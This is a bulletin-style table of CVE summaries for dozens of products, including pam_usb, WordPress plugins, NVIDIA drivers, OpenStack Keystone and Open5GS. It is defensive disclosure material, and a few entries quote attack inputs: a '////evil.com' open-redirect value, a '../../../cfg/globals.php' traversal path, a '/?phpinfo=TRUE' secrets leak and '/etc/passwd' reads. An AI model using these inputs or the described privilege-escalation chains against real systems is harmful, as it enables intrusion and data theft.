| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb is a PAM module loaded into the host process (sudo, login, GDM, GNOME Shell). Display managers such as GDM run multiple concurrent authentication threads. Three functions used by the deny_remote feature called the non-reentrant strtok(), which stores state in a single global pointer. If two authentications race, one thread's strtok() call can overwrite the other's in-progress tokenisation pointer, causing incorrect parsing of the tmux session data or the /proc environ scan that backs the remote-session detection logic. Additionally, pusb_tmux_get_client_tty() passed the raw pointer returned by getenv(TMUX) directly to strtok(). getenv() returns a pointer into the live process environment block; strtok() inserts NUL bytes into that block, permanently corrupting the TMUX variable for subsequent code running in the same process. In long-lived display managers this affects all future authentications in that process. The combined effect can cause deny_remote=true to return an incorrect decision for a remote session, or an incorrect decision for a local session, depending on thread interleaving. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.3 | CVE-2026-47270 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, pam_usb builds XPath expressions from user-supplied identifiers (PAM username, service name) and device-supplied identifiers (USB device serial, model, vendor) to query /etc/pamusb.conf. These identifiers were not validated for XPath metacharacters, allowing injection of arbitrary XPath predicates. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.5 | CVE-2026-47273 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, multiple pam_usb helper tools resolved external binaries through the PATH environment variable rather than using absolute paths. An attacker who can influence the process environment during PAM authentication or tool execution could substitute malicious binaries. The affected tools are pamusb-check (src/tmux.c), pamusb-conf (tools/pamusb-conf), and pamusb-keyring-unlock-gnome (tools/pamusb-keyring-unlock-gnome). This vulnerability is fixed in 0.9.0. | 2026-05-27 | 6.3 | CVE-2026-47274 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/conf.c allocates heap memory proportional to n_devices, a count derived from libxml2 XPath evaluation of the config file, without first enforcing an upper bound. On 32-bit targets (armv7l, i686 -- both listed in the project Makefile), the multiplication n_devices * sizeof(t_pusb_device) wraps around size_t, causing xmalloc() to receive a very small size. Because xmalloc() only calls abort() on NULL return, a small-but-non-NULL allocation is accepted, and subsequent array writes overflow the heap. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 6.7 | CVE-2026-48065 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.0, src/mem.c implemented out-of-memory guards for xmalloc(), xrealloc(), and xstrdup() using assert(data != NULL). The C standard specifies that all assert() expressions are compiled out when NDEBUG is defined at build time. NDEBUG is commonly defined in release and packaging builds (Debian, Fedora, Arch package flags all define it via -DNDEBUG in CFLAGS). With the guard removed, xmalloc/xrealloc/xstrdup silently return NULL on allocation failure. Every caller in the codebase dereferences the return value without a NULL check -- this is the intended design, as the guard was supposed to abort before the dereference. With the guard gone, any allocation failure causes a NULL pointer dereference, crashing the PAM module. A crash in a PAM module loaded by sudo or login causes authentication to fail for the duration of the crash, creating a local denial-of-service condition. An attacker who can induce memory pressure at authentication time can lock all users out of sudo and login. This vulnerability is fixed in 0.9.0. | 2026-05-27 | 5.1 | CVE-2026-47271 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/log.c contains a process-wide static pointer that is written on every PAM invocation with the address of a stack-local variable. This violates the PAM re-entrancy requirement and creates a data race when the PAM stack is invoked concurrently from multiple threads. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 5.7 | CVE-2026-48066 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.8.7, src/device.c passed the return values of udisks_drive_get_serial(), udisks_drive_get_vendor(), and udisks_drive_get_model() directly to strcmp() without NULL checks. The GIO/UDisks API documentation states these accessors can return NULL for devices that do not expose the corresponding field. Passing NULL to strcmp() is undefined behaviour (typically a SIGSEGV). This vulnerability is fixed in 0.8.7. | 2026-05-27 | 4.6 | CVE-2026-44710 |
| mcdope--pam_usb | pam_usb provides hardware authentication for Linux using ordinary removable media. Prior to 0.9.1, src/evdev.c silently ignores EACCES errors when opening /dev/input/event* nodes, causing pusb_has_virtual_input_device() to return 0 (no virtual devices found) even when every open() call failed due to insufficient permissions. The caller in src/local.c cannot distinguish a clean absence of virtual devices from a permission-denied scan, and acts on the false negative by continuing authentication without denying. This vulnerability is fixed in 0.9.1. | 2026-05-27 | 4.4 | CVE-2026-48792 |
| Melapress--WP Activity Log | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Melapress WP Activity Log allows DOM-Based XSS. This issue affects WP Activity Log: from n/a through 5.6.3. | 2026-05-25 | 6.5 | CVE-2026-45435 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO creates one shared UFOWebSocketHandler instance and reuses it for multiple authenticated WebSocket connections. The handler stores per-connection protocol objects in mutable instance fields. Each new WebSocket connection overwrites those fields. Later, message handlers send responses through the shared fields instead of through protocol objects bound to the originating connection. As a result, the most recently connected authenticated client can receive protocol responses that belong to another authenticated client. | 2026-05-27 | 6.3 | CVE-2026-46416 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO's constellation client tracks pending task responses by session_id only and does not verify that a TASK_END message came from the device that originally received the task. When the constellation sends a task to a target device, it records a pending Future under a session key. The pending task record stores the expected device ID, but the completion path ignores that binding. If another authenticated peer device sends a forged TASK_END with the same session_id, the constellation accepts the response and completes the victim device's pending Future with attacker-controlled result data. This is an authenticated cross-device task-result injection issue. | 2026-05-27 | 5.9 | CVE-2026-46538 |
| microsoft--UFO | Microsoft UFO open-source framework for intelligent automation across devices and platforms. In 3.0.1-4-ge2626659, Microsoft UFO accepts client-supplied session_id values in WebSocket task messages and reuses an existing in-memory session object if that session_id already exists. If a prior session has completed and remains in memory with populated results, a different authenticated client can send a new TASK message using the same session_id. The server re-enters the existing session object and sends the stale stored result to the new requester through the normal send_task_end() callback path. This is an authenticated cross-client stale result replay issue. The issue requires that the attacker knows or can predict a live or recently completed session_id. | 2026-05-27 | 5.3 | CVE-2026-46544 |
| minhnhut--MinhNhut Link Gateway | The MinhNhut Link Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter on the redirect page in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-3349 |
| minhnhut--MinhNhut Link Gateway | The MinhNhut Link Gateway plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's settings (Description, Title, and other fields) in all versions up to, and including, 3.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Administrator-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the redirect page. This only affects multi-site installations and installations where unfiltered_html has been disabled. | 2026-05-27 | 4.4 | CVE-2026-3348 |
| mkhfr--Old Posts Highlighter | The Old Posts Highlighter plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.3. This is due to missing or incorrect nonce validation on the OPH_options function. This makes it possible for unauthenticated attackers to update the plugin's configuration settings without authorization via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-27 | 4.3 | CVE-2026-7614 |
| morettolss--Google+ Link Name | The Google+ Link Name plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'gplusnamelink' shortcode in versions up to, and including, 1.0. This is due to insufficient input sanitization and output escaping on user supplied attributes ('id' and 'name') in the gplusnamelink_generate() function, which are concatenated directly into the rendered HTML without calling esc_attr() or esc_html(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8842 |
| mr2p--Meta Field Block Display custom fields in the Block Editor without coding | The Meta Field Block plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.5.1. This is due to the plugin allowing users to specify arbitrary object IDs and object types via block attributes without validating whether the authenticated user has permission to access the requested object's metadata. This makes it possible for authenticated attackers, with Contributor-level access and above, to read arbitrary user meta, post meta, and term meta data from any object in the database. On sites using plugins that store sensitive data in meta fields (e.g., WooCommerce billing/shipping information), this could lead to the exposure of Personally Identifiable Information (PII) including names, email addresses, phone numbers, and physical addresses. | 2026-05-28 | 6.5 | CVE-2026-3173 |
| mshomali--Dideo | The Dideo plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'dideo' shortcode in version 1.0. This is due to insufficient input sanitization and output escaping on the 'id' shortcode attribute, which is interpolated directly into an HTML iframe 'src' attribute without escaping in the dideo() shortcode handler. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8847 |
| murtaza-nasir--speakr | Speakr is a personal, self-hosted web application designed for transcribing audio recordings. Prior to 0.8.20-alpha, the is_safe_url() helper used to validate post-login redirect targets applied urljoin(request.host_url, target) before parsing, while the controller passed the raw target to redirect(). A scheme-relative input such as ////evil.com resolved to a same-host URL during validation but was emitted verbatim in the Location header, where the browser interpreted it as a network-path-relative redirect to an attacker-controlled host. This vulnerability is fixed in 0.8.20-alpha. | 2026-05-28 | 6.1 | CVE-2026-45307 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a server-side request forgery vulnerability in CurlInputPlugin where CURLOPT_FOLLOWLOCATION is set without CURLOPT_REDIR_PROTOCOLS_STR, allowing unauthenticated attackers to bypass the http/https scheme restriction by causing a malicious HTTP server to redirect to non-HTTP protocols such as gopher, ftp, sftp, ldap, dict, rtmp, or rtsp. Attackers can trigger this vulnerability via MPD commands that initiate URL fetches, including add, readcomments, albumart, readpicture, or load, to interact with internal or restricted network services on systems running libcurl versions prior to 7.85.0. | 2026-05-28 | 5.8 | CVE-2026-49129 |
| MusicPlayerDaemon--MPD | Music Player Daemon (MPD) before version 0.24.11 contains a CRLF injection vulnerability in the xspf_char_data function within the XSPF playlist plugin that allows attackers to embed literal CR/LF bytes in URI fields by supplying a malicious XSPF playlist with XML numeric character references. Attackers can inject forged key-value lines through the location field into MPD protocol responses including playlistinfo, currentsong, and listplaylist outputs, as well as the state file writer, by exploiting Expat's decoding of numeric character references prior to the character data callback. | 2026-05-28 | 5.3 | CVE-2026-49130 |
| mutualfunddata--Mutual Funds Data | The Mutual Funds Data plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' shortcode attribute in versions up to, and including, 1.2.1. This is due to insufficient input sanitization and output escaping on the user supplied 'title' attribute in the mfd_shortcode() function, which is concatenated directly into the HTML output within a <caption> element. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8869 |
| nakamura1458--auto making JSON-LD | The auto making JSON-LD plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.5.3. This is due to missing or incorrect nonce validation on the amJL_certification function. This makes it possible for unauthenticated attackers to update the plugin's license key option, and subsequently trigger license validation and pro feature installation on the victim site without the administrator's consent via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Successful exploitation can trigger downstream calls to amJL_is_license_valid() and amJL_download_and_install_pro_features(), meaning the impact extends beyond a simple settings change to unauthorized installation of plugin components. | 2026-05-27 | 4.3 | CVE-2026-8938 |
| nanomq--nanomq | NanoMQ MQTT Broker (NanoMQ) is an all-around Edge Messaging Platform. Prior to 0.24.14, aio->prov_data is stored as nni_quic_conn* during dialing, but read as ex_quic_conn* during dialer close. This type confusion causes invalid object interpretation and leads to close-path hang/crash behavior. This vulnerability is fixed in 0.24.14. | 2026-05-29 | 4.5 | CVE-2026-44640 |
| NASA--openVSP | NASA openVSP 3.16.1 contains a buffer overflow vulnerability that allows local attackers to crash the application by supplying an excessively long string in the geometry name field. Attackers can trigger a denial of service by pasting a 5000-byte payload into the name input field within the Geom browser pod addition interface. | 2026-05-25 | 6.2 | CVE-2018-25367 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, Nautobot UI object-bulk-rename endpoints (for example, /dcim/interfaces/rename/) were vulnerable to application-wide denial of service via maliciously crafted regular expressions in the find field in combination with the use_regex flag. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 6.5 | CVE-2026-44796 |
| nautobot--nautobot | Nautobot is a Network Source of Truth and Network Automation Platform. Prior to 2.4.33 and 3.1.2, in the case of inter-object references via GenericForeignKey (a pattern allowing an object to reference another object that may belong to one of several different "content types" or database tables), when creating or updating an object containing a GenericForeignKey, Nautobot's REST API failed to enforce user "view" permissions when determining whether a given reference to another object would be valid. This vulnerability is fixed in 2.4.33 and 3.1.2. | 2026-05-28 | 5.4 | CVE-2026-44794 |
| Navigatecms--Navigate CMS | Navigate CMS 2.8.5 contains a path traversal vulnerability that allows authenticated users to download arbitrary files by injecting directory traversal sequences in the id parameter. Attackers can send GET requests to navigate_download.php with path traversal payloads ../../../cfg/globals.php to access sensitive configuration files and system files outside the intended directory. | 2026-05-29 | 6.5 | CVE-2018-25393 |
| neilmccutcheon--Instant-Quote.co Quotation Page | The Instant-Quote.co Quotation Page plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Shortcode Attributes in all versions up to, and including, 1.3.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A Contributor-level user can trigger execution against higher-privileged users by embedding the malicious shortcode in a post submitted for review, causing the injected scripts to execute when an administrator previews or views the post. | 2026-05-27 | 6.4 | CVE-2026-8884 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In 2025.81 and earlier, an authenticated unrestricted file upload vulnerability exists in FacturaScripts' product image upload functionality. An attacker with valid credentials can upload a PHP file disguised as a GIF image (using a GIF89a header), bypassing MIME type validation. The file is stored with its original extension, including executable extensions such as .php. The vulnerability exists the addImageAction() method of Core/Lib/ExtendedController/ProductImagesTrait.php. | 2026-05-27 | 6.3 | CVE-2026-42879 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. In 2025.92 and earlier, a stored Cross-Site Scripting (XSS) vulnerability exists in the product search modal of sales (Core/Lib/AjaxForms/SalesModalHTML.php) and purchases documents (Core/Lib/AjaxForms/PurchasesModalHTML.php). An authenticated user with access to the warehouse module can create a product with a malicious reference that executes arbitrary JavaScript in the browser of any other user who opens the product search modal inside an invoice, order, or delivery note. | 2026-05-27 | 5.4 | CVE-2026-42877 |
| NeoRazorX--facturascripts | FacturaScripts is an open source accounting and invoicing software. Prior to v2026, an unauthenticated information disclosure vulnerability in the Installer controller allows any remote attacker to trigger phpinfo() on a fresh FacturaScripts deployment by requesting /?phpinfo=TRUE, exposing full PHP configuration, server environment variables (including any database credentials, API keys, or application secrets set as env vars), filesystem paths, and loaded extensions without being authenticated. This vulnerability is fixed in v2026. | 2026-05-27 | 5.3 | CVE-2026-42878 |
| Nexcess--WPComplete | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nexcess WPComplete wpcomplete allows Stored XSS.This issue affects WPComplete: from n/a through <= 2.9.5.4. | 2026-05-27 | 6.5 | CVE-2026-42750 |
| nhadjidimitrov--LiveSmart Video Chat Live Video Chat | The LiveSmart Video Chat Live Video Chat plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'livesmart_widget' shortcode in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-28 | 6.4 | CVE-2026-9644 |
| Nikki Blight--QR Redirector | Missing Authorization vulnerability in Nikki Blight QR Redirector allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects QR Redirector: from n/a through 2.0.3. | 2026-05-25 | 4.3 | CVE-2026-24545 |
| nsthemes--NS Product icon badge | The NS Product icon badge plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-05-27 | 6.1 | CVE-2026-8707 |
| nuts-foundation--nuts-node | nuts-node is the reference implementation of the Nuts specification. Prior to 6.2.3 and 5.4.31, the v1 access token introspection endpoint (/auth/v1/introspect_access_token) accepts any JWT signed by a key present on the node, without validating the JWT type, issuer-to-key binding, or required claims. This allows a Verifiable Presentation (VP) JWT to be replayed as an access token and receive an active: true introspection response. This vulnerability is fixed in 6.2.3 and 5.4.31. | 2026-05-26 | 4.4 | CVE-2026-41164 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability where an attacker could leak held driver locks. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 6.5 | CVE-2026-24182 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in the Multi-Instance GPU (MIG) partition management, where an insecure default initialization of memory subsystem routing resources could lead to data corruption or a hang during partition reconfiguration. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 6.5 | CVE-2026-24197 |
| NVIDIA--GeForce | NVIDIA GPU Display Driver for Linux contains a vulnerability where an advanced attacker could use a race condition to leak sensitive memory, which might cause limited exposure of sensitive information to an unauthorized actor. A successful exploit of this vulnerability might lead to denial of service, data tampering, and information disclosure. | 2026-05-26 | 5.6 | CVE-2026-24198 |
| NVIDIA--GeForce | NVIDIA Display Driver for Windows and Linux contains a vulnerability in the kernel driver, where a user could cause an incorrect permission assignment for a critical resource. A successful exploit of this vulnerability might lead to data tampering and denial of service. | 2026-05-26 | 4.4 | CVE-2025-33221 |
| NVIDIA--GeForce | NVIDIA Display Driver for Linux contains a vulnerability in a kernel module, where a user could cause a race condition by reordering compiler or processor memory instructions. A successful exploit of this vulnerability might lead to denial of service. | 2026-05-26 | 4.7 | CVE-2026-24199 |
| NVIDIA--Virtual GPU Manager | NVIDIA vGPU software contains a vulnerability in the virtual GPU manager, where an attacker could cause an out-of-bound access. A successful exploit of this vulnerability might lead to data tampering, denial of service, or information disclosure. | 2026-05-26 | 5.8 | CVE-2026-24201 |
| octalmage--Github Shortcode | The Github Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'repo' shortcode attribute in the 'github' shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-05-27 | 6.4 | CVE-2026-8042 |
| OFCMS--OFCMS | A security flaw has been discovered in OFCMS up to 1.1.3. The impacted element is the function Query of the file ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\ComnController.java of the component ComnController. Performing a manipulation of the argument system.user.query results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10193 |
| OFCMS--OFCMS | A vulnerability was identified in OFCMS 1.1.3. This issue affects the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SystemDictController.java of the component JSON Query Interface. The manipulation leads to sql injection. The attack can be initiated remotely. The exploit is publicly available and might be used. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10202 |
| OFCMS--OFCMS | A security flaw has been discovered in OFCMS 1.1.3. Impacted is the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SystemParamController.java of the component JSON Query Interface. The manipulation results in sql injection. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10203 |
| OFCMS--OFCMS | A weakness has been identified in OFCMS 1.1.3. The affected element is the function Query of the file \ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\system\SysUserController.java of the component JSON Query Interface. This manipulation causes sql injection. The attack may be initiated remotely. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet. | 2026-05-31 | 6.3 | CVE-2026-10204 |
| OFFIS--DCMTK | A weakness has been identified in OFFIS DCMTK 3.7.0. This affects the function DcmQueryRetrieveIndexDatabaseHandle::deleteOldestImages of the file dcmqrdb/libsrc/dcmqrdbi.cc of the component dcmqrscp. Executing a manipulation can lead to heap-based buffer overflow. The attack may be launched remotely. This patch is called 0f78a4ef6f645ea5530166e445e5436a5de58e75. A patch should be applied to remediate this issue. | 2026-05-31 | 6.3 | CVE-2026-10194 |
| open-quantum-safe--liboqs | liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. Prior to 0.16.0, an out-of-bounds read has been identified in the XMSS and XMSS^MT stateful signature verification code. When the verification function is called with a signature buffer shorter than the expected signature size for the given parameter set, the implementation does not validate the caller-supplied length and proceeds to read past the end of the buffer. The out-of-bounds bytes are consumed only as input to an internal hash computation and are not returned to the caller, so no oracle exists to leak their contents to an attacker. The primary observable effect is a possible crash (denial of service) of the verifying process if the read crosses into an unmapped memory page. This vulnerability is fixed in 0.16.0. | 2026-05-29 | 5.3 | CVE-2026-44518 |
| open-quantum-safe--liboqs | liboqs is a C-language cryptographic library that provides implementations of post-quantum cryptography algorithms. Prior to 0.16.0, an out-of-bounds read has been identified in the XMSS and XMSS^MT stateful signature verification code. When the verification function is called with a correctly-sized signature buffer for the declared algorithm but a public key whose OID bytes (pk[0..3]) reference a different XMSS parameter set with a larger sig_bytes, the implementation re-parses the OID from the public key inside xmss_sign_open / xmssmt_sign_open and uses the resulting (larger) sig_bytes to index the caller-supplied signature buffer. As with CVE-2026-44518, the out-of-bounds bytes are consumed only as input to an internal hash computation and are not returned to the caller, so no oracle exists to leak their contents to an attacker. The primary observable effect is a possible crash (denial of service) of the verifying process if the read crosses into an unmapped memory page. This vulnerability is fixed in 0.16.0. | 2026-05-29 | 5.3 | CVE-2026-46344 |
| open-telemetry--opentelemetry-dotnet-contrib | The OpenTelemetry.Exporter.Instana exports telemetry to Instana backend. Prior to 1.1.0, the OpenTelemetry.Exporter.Instana NuGet package does not validate HTTPS/TLS certificates are valid when sending telemetry to a configured Instana back-end when a proxy is configured using the INSTANA_ENDPOINT_PROXY environment variable. If a network attacker can Man-in-the-Middle (MitM) the proxy connection, all OpenTelemetry telemetry data and the Instana API key are exposed to the attacker. This vulnerability is fixed in 1.1.0. | 2026-05-26 | 6.5 | CVE-2026-44213 |
| open-telemetry--opentelemetry-java | opentelemetry-java is the Java implementation of the OpenTelemetry API for recording telemetry, and SDK for managing telemetry recorded by the API. Prior to 1.62.0, a vulnerability affects the baggage propagation implementation in opentelemetry-api and opentelemetry-extension-trace-propagators. Parsing oversized baggage causes unbounded memory allocation and CPU consumption. Because baggage is automatically re-injected into every outgoing request, the effect can fan out to downstream services that never received the original malicious request. This vulnerability is fixed in 1.62.0. | 2026-05-28 | 5.3 | CVE-2026-45292 |
| Open5GS--Open5GS | A vulnerability was found in Open5GS up to 2.7.7. Affected by this vulnerability is an unknown functionality in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. The manipulation results in denial of service. It is possible to launch the attack remotely. The exploit has been made public and could be used. A patch should be applied to remediate this issue. | 2026-05-30 | 4.3 | CVE-2026-10113 |
| Open5GS--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. Affected by this issue is the function handle_scp_info in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. This manipulation causes out-of-bounds write. The attack can be initiated remotely. The exploit has been publicly disclosed and may be utilized. To fix this issue, it is recommended to deploy a patch. | 2026-05-30 | 4.3 | CVE-2026-10114 |
| Open5GS--Open5GS | A vulnerability was identified in Open5GS up to 2.7.7. This affects an unknown part in the library lib/sbi/nnrf-handler.c of the component Shared NF-profile Parser. Such manipulation leads to denial of service. The attack can be launched remotely. The exploit is publicly available and might be used. It is advisable to implement a patch to correct this issue. | 2026-05-30 | 4.3 | CVE-2026-10115 |
| Open5GS--Open5GS | A security flaw has been discovered in Open5GS up to 2.7.7. This vulnerability affects the function ogs_sbi_xact_add in the library /lib/core/ogs-timer.c of the component ue-authentications Endpoint. Performing a manipulation results in denial of service. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks. Applying a patch is the recommended action to fix this issue. | 2026-05-30 | 4.3 | CVE-2026-10116 |
| Open5GS--Open5GS | A weakness has been identified in Open5GS up to 2.7.7. This issue affects the function ogs_pool_id_calloc in the library /lib/sbi/nghttp2-server.c. Executing a manipulation can lead to denial of service. The attack may be launched remotely. The exploit has been made available to the public and could be used for attacks. It is best practice to apply a patch to resolve this issue. | 2026-05-30 | 4.3 | CVE-2026-10117 |
| Open5GS--Open5GS | A vulnerability was determined in Open5GS up to 2.7.7. This affects the function handle_amf_info in the library /lib/sbi/nnrf-handler.c of the component nf-instances Endpoint. Executing a manipulation of the argument nf_info_pool can lead to resource consumption. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. Applying a patch is advised to resolve this issue. The issue report is flagged as already-fixed. | 2026-05-30 | 4.3 | CVE-2026-10156 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains an SSRF policy bypass vulnerability in browser debug and export routes that allows reuse of already-open blocked tabs. Attackers with access to these routes can bypass private-network SSRF policies by reusing blocked tabs to export or inspect content that should remain protected. | 2026-05-29 | 6.5 | CVE-2026-35673 |
| OpenClaw--OpenClaw | OpenClaw before 2026.4.29 contains a policy bypass vulnerability in QQBot admin commands that allows authenticated senders to skip DM-only and allowFrom policy checks. Attackers can route admin commands from unauthorized senders or contexts to execute restricted behavior that policy should have blocked. | 2026-05-29 | 5.4 | CVE-2026-34507 |
| OpenClaw--OpenClaw | OpenClaw before 2026.5.12 contains a privilege escalation vulnerability in Slack plugin approvals that allows exec-authorized users to resolve plugin approvals through the exec approver gate. Attackers with limited exec approval permissions can bypass intended approval splits to approve plugin actions outside operator configuration. | 2026-05-29 | 4.3 | CVE-2026-32906 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers can exploit this to access sensitive files including /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process. | 2026-05-26 | 4.9 | CVE-2026-41917 |
| Openkm--OpenKM Community Edition | OpenKM 6.3.12 contains a local file inclusion vulnerability in the administrative scripting interface at /admin/Scripting that allows authenticated administrators to read arbitrary files by supplying an attacker-controlled filesystem path through the fsPath parameter with action=Load. Attackers can exploit this to access sensitive files including /etc/passwd, configuration files containing database credentials, and JVM keystores accessible to the OpenKM process. | 2026-05-26 | 4.9 | CVE-2026-41917 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone application credential authentication plugin does not verify that the user supplied in the authentication request matches the owner of the application credential. An attacker can authenticate with their own application credential ID and secret while specifying a different user's name and domain in the request body. Keystone issues a token attributed to the victim user. The impersonated token is project-scoped and carries the intersection of the application credential's roles and the victim's actual roles on the project. This enables audit evasion, reading the victim's credentials, and acting as the victim within shared projects. | 2026-05-28 | 6 | CVE-2026-42998 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone RBAC policy enforcer in enforce_call unconditionally merges the raw JSON request body into the policy enforcement dictionary via policy_dict.update(json_input.copy()), overwriting trusted target data that was previously set from database lookups. Because flask.request.get_json is called with force=True, this works regardless of Content-Type or HTTP method. Any authenticated user can inject arbitrary policy target attributes (e.g., user_id, project_id) into the request body to bypass RBAC checks and perform unauthorized operations on resources belonging to other users or projects. This was introduced in commit 5ea59f52 (Rocky/14.0.0). | 2026-05-28 | 6 | CVE-2026-42999 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. When combined with an application credential impersonation vulnerability, an attacker with the member role on a project can escalate to admin by chaining unrestricted application credentials with Keystone trusts. The impersonated token carries the victim's identity, which passes the trustor validation check. Keystone then validates the delegated roles against the victim's actual role assignments in the database, not the roles on the requesting token. This allows the attacker to create a trust delegating the victim's admin role to themselves. The trust persists independently, and additional trusts and application credentials can be created to maintain access. All actions are logged under the victim's identity. | 2026-05-28 | 6 | CVE-2026-43000 |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone before 29.0.2. The Keystone federated token rescoping mechanism does not propagate the original token's expiry to the newly issued token. When a federated user rescopes a token via POST /v3/auth/tokens, the handle_scoped_token() function in the mapped authentication plugin returns response data without an expires_at value. The token provider falls back to issuing a token with a fresh default TTL. By rescoping repeatedly before each token expires, a user can maintain access indefinitely, bypassing operator-configured token lifetime policies. This is a variant of CVE-2012-3426. Only deployments using federated identity (SAML2, OpenID Connect) are affected. | 2026-05-28 | 6 | CVE-2026-44394 |
| Openstamanager--Open STA Manager | Open STA Manager 2.3 contains a path traversal vulnerability that allows authenticated users to download arbitrary files by manipulating the file parameter. Attackers can send GET requests to modules/backup/actions.php with op=getfile and traverse directories using ../ sequences to access sensitive system files. | 2026-05-30 | 6.5 | CVE-2018-25421 |
